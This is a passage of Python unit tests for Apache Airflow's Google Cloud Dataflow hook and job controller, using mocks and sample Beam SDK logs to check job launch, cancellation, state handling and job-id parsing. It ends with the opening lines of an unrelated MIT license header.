on_new_job_id_callback = mock.MagicMock()
result = self.dataflow_hook.start_flex_template(
body={"launchParameter": TEST_FLEX_PARAMETERS},
location=TEST_LOCATION,
project_id=TEST_PROJECT_ID,
on_new_job_id_callback=on_new_job_id_callback,
)
on_new_job_id_callback.assert_called_once_with(TEST_JOB_ID)
launch_method.assert_called_once_with(
projectId='test-project-id',
body={'launchParameter': TEST_FLEX_PARAMETERS},
location=TEST_LOCATION,
)
mock_controller.assert_called_once_with(
dataflow=mock_conn.return_value,
project_number=TEST_PROJECT_ID,
job_id=TEST_JOB_ID,
location=TEST_LOCATION,
poll_sleep=self.dataflow_hook.poll_sleep,
num_retries=self.dataflow_hook.num_retries,
cancel_timeout=DEFAULT_CANCEL_TIMEOUT,
wait_until_finished=self.dataflow_hook.wait_until_finished,
)
        mock_controller.return_value.wait_for_done.assert_called_once()
        mock_controller.return_value.get_jobs.assert_called_once()
assert result == {"id": TEST_JOB_ID}
@mock.patch(DATAFLOW_STRING.format('_DataflowJobsController'))
@mock.patch(DATAFLOW_STRING.format('DataflowHook.get_conn'))
def test_cancel_job(self, mock_get_conn, jobs_controller):
self.dataflow_hook.cancel_job(
job_name=UNIQUE_JOB_NAME, job_id=TEST_JOB_ID, project_id=TEST_PROJECT, location=TEST_LOCATION
)
jobs_controller.assert_called_once_with(
dataflow=mock_get_conn.return_value,
job_id=TEST_JOB_ID,
location=TEST_LOCATION,
name=UNIQUE_JOB_NAME,
poll_sleep=10,
project_number=TEST_PROJECT,
num_retries=5,
drain_pipeline=False,
cancel_timeout=DEFAULT_CANCEL_TIMEOUT,
)
        jobs_controller.return_value.cancel.assert_called_once_with()
@mock.patch(DATAFLOW_STRING.format('_DataflowJobsController'))
@mock.patch(DATAFLOW_STRING.format('DataflowHook.provide_authorized_gcloud'))
@mock.patch(DATAFLOW_STRING.format('DataflowHook.get_conn'))
@mock.patch(DATAFLOW_STRING.format('subprocess.run'))
    def test_start_sql_job(
self, mock_run, mock_get_conn, mock_provide_authorized_gcloud, mock_controller
):
test_job = {'id': "TEST_JOB_ID"}
mock_controller.return_value.get_jobs.return_value = [test_job]
mock_run.return_value = mock.MagicMock(
stdout=f"{TEST_JOB_ID}\n".encode(), stderr=f"{TEST_JOB_ID}\n".encode(), returncode=0
)
on_new_job_id_callback = mock.MagicMock()
result = self.dataflow_hook.start_sql_job(
job_name=TEST_SQL_JOB_NAME,
query=TEST_SQL_QUERY,
options=TEST_SQL_OPTIONS,
location=TEST_LOCATION,
project_id=TEST_PROJECT,
on_new_job_id_callback=on_new_job_id_callback,
)
mock_run.assert_called_once_with(
[
'gcloud',
'dataflow',
'sql',
'query',
TEST_SQL_QUERY,
'--project=test-project',
'--format=value(job.id)',
'--job-name=test-sql-job-name',
'--region=custom-location',
'--bigquery-project=test-project',
'--bigquery-dataset=test-dataset',
'--bigquery-table=beam_output',
'--bigquery-write-disposition=write-truncate',
],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
)
mock_controller.assert_called_once_with(
dataflow=mock_get_conn.return_value,
job_id=TEST_JOB_ID,
location=TEST_LOCATION,
poll_sleep=10,
project_number=TEST_PROJECT,
num_retries=5,
drain_pipeline=False,
wait_until_finished=None,
)
mock_controller.return_value.wait_for_done.assert_called_once()
assert result == test_job
@mock.patch(DATAFLOW_STRING.format('DataflowHook.get_conn'))
@mock.patch(DATAFLOW_STRING.format('DataflowHook.provide_authorized_gcloud'))
@mock.patch(DATAFLOW_STRING.format('subprocess.run'))
    def test_start_sql_job_failed_to_run(self, mock_run, mock_provide_authorized_gcloud, mock_get_conn):
mock_run.return_value = mock.MagicMock(
stdout=f"{TEST_JOB_ID}\n".encode(), stderr=f"{TEST_JOB_ID}\n".encode(), returncode=1
)
with pytest.raises(AirflowException):
self.dataflow_hook.start_sql_job(
job_name=TEST_SQL_JOB_NAME,
query=TEST_SQL_QUERY,
options=TEST_SQL_OPTIONS,
location=TEST_LOCATION,
project_id=TEST_PROJECT,
on_new_job_id_callback=mock.MagicMock(),
)
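# TestDataflowJob exercises _DataflowJobsController directly: job discovery with and
# without a job id, waiting on batch and streaming jobs, terminal-state errors,
# cancel/drain behaviour (including the cancel timeout), and fetching job messages
# and autoscaling events.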
class TestDataflowJob(unittest.TestCase):
def setUp(self):
self.mock_dataflow = MagicMock()
def test_dataflow_job_init_with_job_id(self):
mock_jobs = MagicMock()
self.mock_dataflow.projects.return_value.locations.return_value.jobs.return_value = mock_jobs
_DataflowJobsController(
self.mock_dataflow, TEST_PROJECT, TEST_LOCATION, 10, UNIQUE_JOB_NAME, TEST_JOB_ID
).get_jobs()
mock_jobs.get.assert_called_once_with(
projectId=TEST_PROJECT, location=TEST_LOCATION, jobId=TEST_JOB_ID
)
def test_dataflow_job_init_without_job_id(self):
job = {"id": TEST_JOB_ID, "name": UNIQUE_JOB_NAME, "currentState": DataflowJobStatus.JOB_STATE_DONE}
mock_list = self.mock_dataflow.projects.return_value.locations.return_value.jobs.return_value.list
(mock_list.return_value.execute.return_value) = {'jobs': [job]}
# fmt: off
(
self.mock_dataflow.projects.return_value.
locations.return_value.
jobs.return_value.
list_next.return_value
) = None
# fmt: on
_DataflowJobsController(
self.mock_dataflow, TEST_PROJECT, TEST_LOCATION, 10, UNIQUE_JOB_NAME
).get_jobs()
mock_list.assert_called_once_with(projectId=TEST_PROJECT, location=TEST_LOCATION)
def test_dataflow_job_wait_for_multiple_jobs(self):
job = {
"id": TEST_JOB_ID,
"name": UNIQUE_JOB_NAME,
"type": DataflowJobType.JOB_TYPE_BATCH,
"currentState": DataflowJobStatus.JOB_STATE_DONE,
}
# fmt: off
(
self.mock_dataflow.projects.return_value.
locations.return_value.
jobs.return_value.
list.return_value.
execute.return_value
) = {
"jobs": [job, job]
}
(
self.mock_dataflow.projects.return_value.
locations.return_value.
jobs.return_value.
list_next.return_value
) = None
# fmt: on
dataflow_job = _DataflowJobsController(
dataflow=self.mock_dataflow,
project_number=TEST_PROJECT,
name=UNIQUE_JOB_NAME,
location=TEST_LOCATION,
poll_sleep=10,
job_id=TEST_JOB_ID,
num_retries=20,
multiple_jobs=True,
)
dataflow_job.wait_for_done()
# fmt: off
self.mock_dataflow.projects.return_value.locations.return_value.jobs.return_value.\
list.assert_called_once_with(location=TEST_LOCATION, projectId=TEST_PROJECT)
self.mock_dataflow.projects.return_value.locations.return_value.jobs.return_value.list\
.return_value.execute.assert_called_once_with(num_retries=20)
# fmt: on
assert dataflow_job.get_jobs() == [job, job]
@parameterized.expand(
[
(DataflowJobStatus.JOB_STATE_FAILED, "Google Cloud Dataflow job name-2 has failed\\."),
(DataflowJobStatus.JOB_STATE_CANCELLED, "Google Cloud Dataflow job name-2 was cancelled\\."),
(DataflowJobStatus.JOB_STATE_DRAINED, "Google Cloud Dataflow job name-2 was drained\\."),
(DataflowJobStatus.JOB_STATE_UPDATED, "Google Cloud Dataflow job name-2 was updated\\."),
(
DataflowJobStatus.JOB_STATE_UNKNOWN,
"Google Cloud Dataflow job name-2 was unknown state: JOB_STATE_UNKNOWN",
),
]
)
def test_dataflow_job_wait_for_multiple_jobs_and_one_in_terminal_state(self, state, exception_regex):
# fmt: off
(
self.mock_dataflow.projects.return_value.
locations.return_value.
jobs.return_value.
list.return_value.
execute.return_value
) = {
"jobs": [
{
"id": "id-1", "name": "name-1",
"type": DataflowJobType.JOB_TYPE_BATCH,
"currentState": DataflowJobStatus.JOB_STATE_DONE
},
{
"id": "id-2", "name": "name-2",
"type": DataflowJobType.JOB_TYPE_BATCH,
"currentState": state
}
]
}
(
self.mock_dataflow.projects.return_value.
locations.return_value.
jobs.return_value.
list_next.return_value
) = None
# fmt: on
dataflow_job = _DataflowJobsController(
dataflow=self.mock_dataflow,
project_number=TEST_PROJECT,
name="name-",
location=TEST_LOCATION,
poll_sleep=0,
job_id=None,
num_retries=20,
multiple_jobs=True,
)
with pytest.raises(Exception, match=exception_regex):
dataflow_job.wait_for_done()
def test_dataflow_job_wait_for_multiple_jobs_and_streaming_jobs(self):
# fmt: off
mock_jobs_list = (
self.mock_dataflow.projects.return_value.
locations.return_value.
jobs.return_value.
list
)
mock_jobs_list.return_value.execute.return_value = {
"jobs": [
{
"id": "id-2",
"name": "name-2",
"currentState": DataflowJobStatus.JOB_STATE_RUNNING,
"type": DataflowJobType.JOB_TYPE_STREAMING
}
]
}
(
self.mock_dataflow.projects.return_value.
locations.return_value.
jobs.return_value.
list_next.return_value
) = None
# fmt: on
dataflow_job = _DataflowJobsController(
dataflow=self.mock_dataflow,
project_number=TEST_PROJECT,
name="name-",
location=TEST_LOCATION,
poll_sleep=0,
job_id=None,
num_retries=20,
multiple_jobs=True,
)
dataflow_job.wait_for_done()
assert 1 == mock_jobs_list.call_count
def test_dataflow_job_wait_for_single_jobs(self):
job = {
"id": TEST_JOB_ID,
"name": UNIQUE_JOB_NAME,
"type": DataflowJobType.JOB_TYPE_BATCH,
"currentState": DataflowJobStatus.JOB_STATE_DONE,
}
# fmt: off
self.mock_dataflow.projects.return_value.locations.return_value. \
jobs.return_value.get.return_value.execute.return_value = job
(
self.mock_dataflow.projects.return_value.
locations.return_value.
jobs.return_value.
list_next.return_value
) = None
# fmt: on
dataflow_job = _DataflowJobsController(
dataflow=self.mock_dataflow,
project_number=TEST_PROJECT,
name=UNIQUE_JOB_NAME,
location=TEST_LOCATION,
poll_sleep=10,
job_id=TEST_JOB_ID,
num_retries=20,
multiple_jobs=False,
)
dataflow_job.wait_for_done()
# fmt: off
self.mock_dataflow.projects.return_value.locations.return_value. \
jobs.return_value.get.assert_called_once_with(
jobId=TEST_JOB_ID,
location=TEST_LOCATION,
projectId=TEST_PROJECT
)
self.mock_dataflow.projects.return_value.locations.return_value. \
jobs.return_value.get.return_value.execute.assert_called_once_with(num_retries=20)
# fmt: on
assert dataflow_job.get_jobs() == [job]
def test_dataflow_job_is_job_running_with_no_job(self):
# fmt: off
mock_jobs_list = (
self.mock_dataflow.projects.return_value.
locations.return_value.
jobs.return_value.
list
)
mock_jobs_list.return_value.execute.return_value = {
"jobs": []
}
(
self.mock_dataflow.projects.return_value.
locations.return_value.
jobs.return_value.
list_next.return_value
) = None
# fmt: on
dataflow_job = _DataflowJobsController(
dataflow=self.mock_dataflow,
project_number=TEST_PROJECT,
name="name-",
location=TEST_LOCATION,
poll_sleep=0,
job_id=None,
num_retries=20,
multiple_jobs=True,
)
result = dataflow_job.is_job_running()
assert result is False
# fmt: off
@parameterized.expand([
# RUNNING
(DataflowJobType.JOB_TYPE_BATCH, DataflowJobStatus.JOB_STATE_RUNNING, None, False),
(DataflowJobType.JOB_TYPE_STREAMING, DataflowJobStatus.JOB_STATE_RUNNING, None, True),
(DataflowJobType.JOB_TYPE_BATCH, DataflowJobStatus.JOB_STATE_RUNNING, True, False),
(DataflowJobType.JOB_TYPE_STREAMING, DataflowJobStatus.JOB_STATE_RUNNING, True, False),
(DataflowJobType.JOB_TYPE_BATCH, DataflowJobStatus.JOB_STATE_RUNNING, False, True),
(DataflowJobType.JOB_TYPE_STREAMING, DataflowJobStatus.JOB_STATE_RUNNING, False, True),
# AWAITING STATE
(DataflowJobType.JOB_TYPE_BATCH, DataflowJobStatus.JOB_STATE_PENDING, None, False),
(DataflowJobType.JOB_TYPE_STREAMING, DataflowJobStatus.JOB_STATE_PENDING, None, False),
(DataflowJobType.JOB_TYPE_BATCH, DataflowJobStatus.JOB_STATE_PENDING, True, False),
(DataflowJobType.JOB_TYPE_STREAMING, DataflowJobStatus.JOB_STATE_PENDING, True, False),
(DataflowJobType.JOB_TYPE_BATCH, DataflowJobStatus.JOB_STATE_PENDING, False, True),
(DataflowJobType.JOB_TYPE_STREAMING, DataflowJobStatus.JOB_STATE_PENDING, False, True),
])
# fmt: on
def test_check_dataflow_job_state_wait_until_finished(
self, job_type, job_state, wait_until_finished, expected_result
):
job = {"id": "id-2", "name": "name-2", "type": job_type, "currentState": job_state}
dataflow_job = _DataflowJobsController(
dataflow=self.mock_dataflow,
project_number=TEST_PROJECT,
name="name-",
location=TEST_LOCATION,
poll_sleep=0,
job_id=None,
num_retries=20,
multiple_jobs=True,
wait_until_finished=wait_until_finished,
)
result = dataflow_job._check_dataflow_job_state(job)
assert result == expected_result
# fmt: off
@parameterized.expand([
# RUNNING
(DataflowJobStatus.JOB_STATE_RUNNING, None, False),
(DataflowJobStatus.JOB_STATE_RUNNING, True, False),
(DataflowJobStatus.JOB_STATE_RUNNING, False, True),
# AWAITING STATE
(DataflowJobStatus.JOB_STATE_PENDING, None, False),
(DataflowJobStatus.JOB_STATE_PENDING, True, False),
(DataflowJobStatus.JOB_STATE_PENDING, False, True),
])
# fmt: on
def test_check_dataflow_job_state_without_job_type(self, job_state, wait_until_finished, expected_result):
job = {"id": "id-2", "name": "name-2", "currentState": job_state}
dataflow_job = _DataflowJobsController(
dataflow=self.mock_dataflow,
project_number=TEST_PROJECT,
name="name-",
location=TEST_LOCATION,
poll_sleep=0,
job_id=None,
num_retries=20,
multiple_jobs=True,
wait_until_finished=wait_until_finished,
)
result = dataflow_job._check_dataflow_job_state(job)
assert result == expected_result
# fmt: off
@parameterized.expand([
(DataflowJobType.JOB_TYPE_BATCH, DataflowJobStatus.JOB_STATE_FAILED,
"Google Cloud Dataflow job name-2 has failed\\."),
(DataflowJobType.JOB_TYPE_STREAMING, DataflowJobStatus.JOB_STATE_FAILED,
"Google Cloud Dataflow job name-2 has failed\\."),
(DataflowJobType.JOB_TYPE_STREAMING, DataflowJobStatus.JOB_STATE_UNKNOWN,
"Google Cloud Dataflow job name-2 was unknown state: JOB_STATE_UNKNOWN"),
(DataflowJobType.JOB_TYPE_BATCH, DataflowJobStatus.JOB_STATE_UNKNOWN,
"Google Cloud Dataflow job name-2 was unknown state: JOB_STATE_UNKNOWN"),
(DataflowJobType.JOB_TYPE_BATCH, DataflowJobStatus.JOB_STATE_CANCELLED,
"Google Cloud Dataflow job name-2 was cancelled\\."),
(DataflowJobType.JOB_TYPE_STREAMING, DataflowJobStatus.JOB_STATE_CANCELLED,
"Google Cloud Dataflow job name-2 was cancelled\\."),
(DataflowJobType.JOB_TYPE_BATCH, DataflowJobStatus.JOB_STATE_DRAINED,
"Google Cloud Dataflow job name-2 was drained\\."),
(DataflowJobType.JOB_TYPE_STREAMING, DataflowJobStatus.JOB_STATE_DRAINED,
"Google Cloud Dataflow job name-2 was drained\\."),
(DataflowJobType.JOB_TYPE_BATCH, DataflowJobStatus.JOB_STATE_UPDATED,
"Google Cloud Dataflow job name-2 was updated\\."),
(DataflowJobType.JOB_TYPE_STREAMING, DataflowJobStatus.JOB_STATE_UPDATED,
"Google Cloud Dataflow job name-2 was updated\\."),
])
# fmt: on
def test_check_dataflow_job_state_terminal_state(self, job_type, job_state, exception_regex):
job = {"id": "id-2", "name": "name-2", "type": job_type, "currentState": job_state}
dataflow_job = _DataflowJobsController(
dataflow=self.mock_dataflow,
project_number=TEST_PROJECT,
name="name-",
location=TEST_LOCATION,
poll_sleep=0,
job_id=None,
num_retries=20,
multiple_jobs=True,
)
with pytest.raises(Exception, match=exception_regex):
dataflow_job._check_dataflow_job_state(job)
def test_dataflow_job_cancel_job(self):
mock_jobs = self.mock_dataflow.projects.return_value.locations.return_value.jobs
get_method = mock_jobs.return_value.get
get_method.return_value.execute.side_effect = [
{"id": TEST_JOB_ID, "name": JOB_NAME, "currentState": DataflowJobStatus.JOB_STATE_RUNNING},
{"id": TEST_JOB_ID, "name": JOB_NAME, "currentState": DataflowJobStatus.JOB_STATE_PENDING},
{"id": TEST_JOB_ID, "name": JOB_NAME, "currentState": DataflowJobStatus.JOB_STATE_QUEUED},
{"id": TEST_JOB_ID, "name": JOB_NAME, "currentState": DataflowJobStatus.JOB_STATE_CANCELLING},
{"id": TEST_JOB_ID, "name": JOB_NAME, "currentState": DataflowJobStatus.JOB_STATE_DRAINING},
{"id": TEST_JOB_ID, "name": JOB_NAME, "currentState": DataflowJobStatus.JOB_STATE_STOPPED},
{"id": TEST_JOB_ID, "name": JOB_NAME, "currentState": DataflowJobStatus.JOB_STATE_CANCELLED},
]
mock_jobs.return_value.list_next.return_value = None
dataflow_job = _DataflowJobsController(
dataflow=self.mock_dataflow,
project_number=TEST_PROJECT,
name=UNIQUE_JOB_NAME,
location=TEST_LOCATION,
poll_sleep=0,
job_id=TEST_JOB_ID,
num_retries=20,
multiple_jobs=False,
)
dataflow_job.cancel()
get_method.assert_called_with(jobId=TEST_JOB_ID, location=TEST_LOCATION, projectId=TEST_PROJECT)
get_method.return_value.execute.assert_called_with(num_retries=20)
self.mock_dataflow.new_batch_http_request.assert_called_once_with()
mock_batch = self.mock_dataflow.new_batch_http_request.return_value
mock_update = mock_jobs.return_value.update
mock_update.assert_called_once_with(
body={'requestedState': 'JOB_STATE_CANCELLED'},
jobId='test-job-id',
location=TEST_LOCATION,
projectId='test-project',
)
mock_batch.add.assert_called_once_with(mock_update.return_value)
@mock.patch("airflow.providers.google.cloud.hooks.dataflow.timeout")
@mock.patch("time.sleep")
def test_dataflow_job_cancel_job_cancel_timeout(self, mock_sleep, mock_timeout):
mock_jobs = self.mock_dataflow.projects.return_value.locations.return_value.jobs
get_method = mock_jobs.return_value.get
get_method.return_value.execute.side_effect = [
{"id": TEST_JOB_ID, "name": JOB_NAME, "currentState": DataflowJobStatus.JOB_STATE_CANCELLING},
{"id": TEST_JOB_ID, "name": JOB_NAME, "currentState": DataflowJobStatus.JOB_STATE_CANCELLING},
{"id": TEST_JOB_ID, "name": JOB_NAME, "currentState": DataflowJobStatus.JOB_STATE_CANCELLING},
{"id": TEST_JOB_ID, "name": JOB_NAME, "currentState": DataflowJobStatus.JOB_STATE_CANCELLING},
{"id": TEST_JOB_ID, "name": JOB_NAME, "currentState": DataflowJobStatus.JOB_STATE_CANCELLED},
]
mock_jobs.return_value.list_next.return_value = None
dataflow_job = _DataflowJobsController(
dataflow=self.mock_dataflow,
project_number=TEST_PROJECT,
name=UNIQUE_JOB_NAME,
location=TEST_LOCATION,
poll_sleep=4,
job_id=TEST_JOB_ID,
num_retries=20,
multiple_jobs=False,
cancel_timeout=10,
)
dataflow_job.cancel()
get_method.assert_called_with(jobId=TEST_JOB_ID, location=TEST_LOCATION, projectId=TEST_PROJECT)
get_method.return_value.execute.assert_called_with(num_retries=20)
self.mock_dataflow.new_batch_http_request.assert_called_once_with()
mock_batch = self.mock_dataflow.new_batch_http_request.return_value
mock_update = mock_jobs.return_value.update
mock_update.assert_called_once_with(
body={'requestedState': 'JOB_STATE_CANCELLED'},
jobId='test-job-id',
location=TEST_LOCATION,
projectId='test-project',
)
mock_batch.add.assert_called_once_with(mock_update.return_value)
mock_sleep.assert_has_calls([mock.call(4), mock.call(4), mock.call(4)])
mock_timeout.assert_called_once_with(
seconds=10, error_message='Canceling jobs failed due to timeout (10s): test-job-id'
)
@parameterized.expand(
[
(False, "JOB_TYPE_BATCH", "JOB_STATE_CANCELLED"),
(False, "JOB_TYPE_STREAMING", "JOB_STATE_CANCELLED"),
(True, "JOB_TYPE_BATCH", "JOB_STATE_CANCELLED"),
(True, "JOB_TYPE_STREAMING", "JOB_STATE_DRAINED"),
]
)
def test_dataflow_job_cancel_or_drain_job(self, drain_pipeline, job_type, requested_state):
job = {
"id": TEST_JOB_ID,
"name": UNIQUE_JOB_NAME,
"currentState": DataflowJobStatus.JOB_STATE_RUNNING,
"type": job_type,
}
get_method = self.mock_dataflow.projects.return_value.locations.return_value.jobs.return_value.get
get_method.return_value.execute.return_value = job
# fmt: off
job_list_nest_method = (self.mock_dataflow
.projects.return_value.
locations.return_value.
jobs.return_value.list_next)
job_list_nest_method.return_value = None
# fmt: on
dataflow_job = _DataflowJobsController(
dataflow=self.mock_dataflow,
project_number=TEST_PROJECT,
name=UNIQUE_JOB_NAME,
location=TEST_LOCATION,
poll_sleep=10,
job_id=TEST_JOB_ID,
num_retries=20,
multiple_jobs=False,
drain_pipeline=drain_pipeline,
cancel_timeout=None,
)
dataflow_job.cancel()
get_method.assert_called_once_with(jobId=TEST_JOB_ID, location=TEST_LOCATION, projectId=TEST_PROJECT)
get_method.return_value.execute.assert_called_once_with(num_retries=20)
self.mock_dataflow.new_batch_http_request.assert_called_once_with()
mock_batch = self.mock_dataflow.new_batch_http_request.return_value
mock_update = self.mock_dataflow.projects.return_value.locations.return_value.jobs.return_value.update
mock_update.assert_called_once_with(
body={'requestedState': requested_state},
jobId='test-job-id',
location=TEST_LOCATION,
projectId='test-project',
)
mock_batch.add.assert_called_once_with(mock_update.return_value)
mock_batch.execute.assert_called_once()
def test_dataflow_job_cancel_job_no_running_jobs(self):
mock_jobs = self.mock_dataflow.projects.return_value.locations.return_value.jobs
get_method = mock_jobs.return_value.get
get_method.return_value.execute.side_effect = [
{"id": TEST_JOB_ID, "name": JOB_NAME, "currentState": DataflowJobStatus.JOB_STATE_DONE},
{"id": TEST_JOB_ID, "name": JOB_NAME, "currentState": DataflowJobStatus.JOB_STATE_UPDATED},
{"id": TEST_JOB_ID, "name": JOB_NAME, "currentState": DataflowJobStatus.JOB_STATE_DRAINED},
{"id": TEST_JOB_ID, "name": JOB_NAME, "currentState": DataflowJobStatus.JOB_STATE_FAILED},
{"id": TEST_JOB_ID, "name": JOB_NAME, "currentState": DataflowJobStatus.JOB_STATE_CANCELLED},
]
mock_jobs.return_value.list_next.return_value = None
dataflow_job = _DataflowJobsController(
dataflow=self.mock_dataflow,
project_number=TEST_PROJECT,
name=UNIQUE_JOB_NAME,
location=TEST_LOCATION,
poll_sleep=0,
job_id=TEST_JOB_ID,
num_retries=20,
multiple_jobs=False,
)
dataflow_job.cancel()
get_method.assert_called_with(jobId=TEST_JOB_ID, location=TEST_LOCATION, projectId=TEST_PROJECT)
get_method.return_value.execute.assert_called_with(num_retries=20)
self.mock_dataflow.new_batch_http_request.assert_not_called()
mock_jobs.return_value.update.assert_not_called()
def test_fetch_list_job_messages_responses(self):
# fmt: off
mock_list = (
self.mock_dataflow
.projects.return_value
.locations.return_value
.jobs.return_value
.messages.return_value
.list
)
mock_list_next = (
self.mock_dataflow.
projects.return_value.
locations.return_value.
jobs.return_value
.messages.return_value
.list_next
)
# fmt: on
mock_list.return_value.execute.return_value = "response_1"
mock_list_next.return_value = None
jobs_controller = _DataflowJobsController(
dataflow=self.mock_dataflow,
project_number=TEST_PROJECT,
location=TEST_LOCATION,
job_id=TEST_JOB_ID,
)
result = list(jobs_controller._fetch_list_job_messages_responses(TEST_JOB_ID))
mock_list.assert_called_once_with(projectId=TEST_PROJECT, location=TEST_LOCATION, jobId=TEST_JOB_ID)
mock_list_next.assert_called_once_with(
previous_request=mock_list.return_value, previous_response="response_1"
)
assert result == ["response_1"]
@mock.patch(DATAFLOW_STRING.format('_DataflowJobsController._fetch_list_job_messages_responses'))
def test_fetch_job_messages_by_id(self, mock_fetch_responses):
mock_fetch_responses.return_value = iter(
[
{"jobMessages": ["message_1"]},
{"jobMessages": ["message_2"]},
]
)
jobs_controller = _DataflowJobsController(
dataflow=self.mock_dataflow,
project_number=TEST_PROJECT,
location=TEST_LOCATION,
job_id=TEST_JOB_ID,
)
result = jobs_controller.fetch_job_messages_by_id(TEST_JOB_ID)
mock_fetch_responses.assert_called_once_with(job_id=TEST_JOB_ID)
assert result == ['message_1', 'message_2']
@mock.patch(DATAFLOW_STRING.format('_DataflowJobsController._fetch_list_job_messages_responses'))
def test_fetch_job_autoscaling_events_by_id(self, mock_fetch_responses):
mock_fetch_responses.return_value = iter(
[
{"autoscalingEvents": ["event_1"]},
{"autoscalingEvents": ["event_2"]},
]
)
jobs_controller = _DataflowJobsController(
dataflow=self.mock_dataflow,
project_number=TEST_PROJECT,
location=TEST_LOCATION,
job_id=TEST_JOB_ID,
)
result = jobs_controller.fetch_job_autoscaling_events_by_id(TEST_JOB_ID)
mock_fetch_responses.assert_called_once_with(job_id=TEST_JOB_ID)
assert result == ['event_1', 'event_2']
APACHE_BEAM_V_2_14_0_JAVA_SDK_LOG = f"""\
Dataflow SDK version: 2.14.0
Jun 15, 2020 2:57:28 PM org.apache.beam.runners.dataflow.DataflowRunner run
INFO: To access the Dataflow monitoring console, please navigate to https://console.cloud.google.com/dataflow\
/jobsDetail/locations/europe-west3/jobs/{TEST_JOB_ID}?project=XXX
Submitted job: {TEST_JOB_ID}
Jun 15, 2020 2:57:28 PM org.apache.beam.runners.dataflow.DataflowRunner run
INFO: To cancel the job using the 'gcloud' tool, run:
> gcloud dataflow jobs --project=XXX cancel --region=europe-west3 {TEST_JOB_ID}
"""
APACHE_BEAM_V_2_22_0_JAVA_SDK_LOG = f"""\
INFO: Dataflow SDK version: 2.22.0
Jun 15, 2020 3:09:03 PM org.apache.beam.runners.dataflow.DataflowRunner run
INFO: To access the Dataflow monitoring console, please navigate to https://console.cloud.google.com/dataflow\
/jobs/europe-west3/{TEST_JOB_ID}?project=XXXX
Jun 15, 2020 3:09:03 PM org.apache.beam.runners.dataflow.DataflowRunner run
INFO: Submitted job: {TEST_JOB_ID}
Jun 15, 2020 3:09:03 PM org.apache.beam.runners.dataflow.DataflowRunner run
INFO: To cancel the job using the 'gcloud' tool, run:
> gcloud dataflow jobs --project=XXX cancel --region=europe-west3 {TEST_JOB_ID}
"""
APACHE_BEAM_V_2_14_0_PYTHON_SDK_LOG = f"""\
INFO:root:Completed GCS upload to gs://test-dataflow-example/staging/start-python-job-local-5bcf3d71.\
1592286375.000962/apache_beam-2.14.0-cp37-cp37m-manylinux1_x86_64.whl in 0 seconds.
INFO:root:Create job: <Job
createTime: '2020-06-16T05:46:20.911857Z'
currentStateTime: '1970-01-01T00:00:00Z'
id: '{TEST_JOB_ID}'
location: 'us-central1'
name: 'start-python-job-local-5bcf3d71'
projectId: 'XXX'
stageStates: []
startTime: '2020-06-16T05:46:20.911857Z'
steps: []
tempFiles: []
type: TypeValueValuesEnum(JOB_TYPE_BATCH, 1)>
INFO:root:Created job with id: [{TEST_JOB_ID}]
INFO:root:To access the Dataflow monitoring console, please navigate to https://console.cloud.google.com/\
dataflow/jobsDetail/locations/us-central1/jobs/{TEST_JOB_ID}?project=XXX
"""
APACHE_BEAM_V_2_22_0_PYTHON_SDK_LOG = f"""\
INFO:apache_beam.runners.dataflow.internal.apiclient:Completed GCS upload to gs://test-dataflow-example/\
staging/start-python-job-local-5bcf3d71.1592286719.303624/apache_beam-2.22.0-cp37-cp37m-manylinux1_x86_64.whl\
in 1 seconds.
INFO:apache_beam.runners.dataflow.internal.apiclient:Create job: <Job
createTime: '2020-06-16T05:52:04.095216Z'
currentStateTime: '1970-01-01T00:00:00Z'
id: '{TEST_JOB_ID}'
location: 'us-central1'
name: 'start-python-job-local-5bcf3d71'
projectId: 'XXX'
stageStates: []
startTime: '2020-06-16T05:52:04.095216Z'
steps: []
tempFiles: []
type: TypeValueValuesEnum(JOB_TYPE_BATCH, 1)>
INFO:apache_beam.runners.dataflow.internal.apiclient:Created job with id: [{TEST_JOB_ID}]
INFO:apache_beam.runners.dataflow.internal.apiclient:Submitted job: {TEST_JOB_ID}
INFO:apache_beam.runners.dataflow.internal.apiclient:To access the Dataflow monitoring console, please \
navigate to https://console.cloud.google.com/dataflow/jobs/us-central1/{TEST_JOB_ID}?project=XXX
"""
class TestDataflow(unittest.TestCase):
@parameterized.expand(
[
(APACHE_BEAM_V_2_14_0_JAVA_SDK_LOG,),
(APACHE_BEAM_V_2_22_0_JAVA_SDK_LOG,),
(APACHE_BEAM_V_2_14_0_PYTHON_SDK_LOG,),
(APACHE_BEAM_V_2_22_0_PYTHON_SDK_LOG,),
],
name_func=lambda func, num, p: f"{func.__name__}_{num}",
)
def test_data_flow_valid_job_id(self, log):
echos = ";".join(f"echo {shlex.quote(line)}" for line in log.split("\n"))
cmd = ["bash", "-c", echos]
found_job_id = None
def callback(job_id):
nonlocal found_job_id
found_job_id = job_id
BeamCommandRunner(
cmd, process_line_callback=process_line_and_extract_dataflow_job_id_callback(callback)
).wait_for_done()
self.assertEqual(found_job_id, TEST_JOB_ID)
def test_data_flow_missing_job_id(self):
cmd = ['echo', 'unit testing']
found_job_id = None
def callback(job_id):
nonlocal found_job_id
found_job_id = job_id
BeamCommandRunner(
cmd, process_line_callback=process_line_and_extract_dataflow_job_id_callback(callback)
).wait_for_done()
self.assertEqual(found_job_id, None)
@mock.patch('airflow.providers.apache.beam.hooks.beam.BeamCommandRunner.log')
@mock.patch('subprocess.Popen')
@mock.patch('select.select')
def test_dataflow_wait_for_done_logging(self, mock_select, mock_popen, mock_logging):
mock_logging.info = MagicMock()
mock_logging.warning = MagicMock()
mock_proc = MagicMock()
mock_proc.stderr = MagicMock()
mock_proc.stderr.readlines = MagicMock(return_value=['test\n', 'error\n'])
mock_stderr_fd = MagicMock()
mock_proc.stderr.fileno = MagicMock(return_value=mock_stderr_fd)
mock_proc_poll = MagicMock()
mock_select.return_value = [[mock_stderr_fd]]
def poll_resp_error():
            mock_proc.returncode = 1
return True
mock_proc_poll.side_effect = [None, poll_resp_error]
mock_proc.poll = mock_proc_poll
mock_popen.return_value = mock_proc
dataflow = BeamCommandRunner(['test', 'cmd'])
mock_logging.info.assert_called_once_with('Running command: %s', 'test cmd')
self.assertRaises(Exception, dataflow.wait_for_done)
|
|
# Copyright (c) 2012-2015 Netforce Co. Ltd.
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
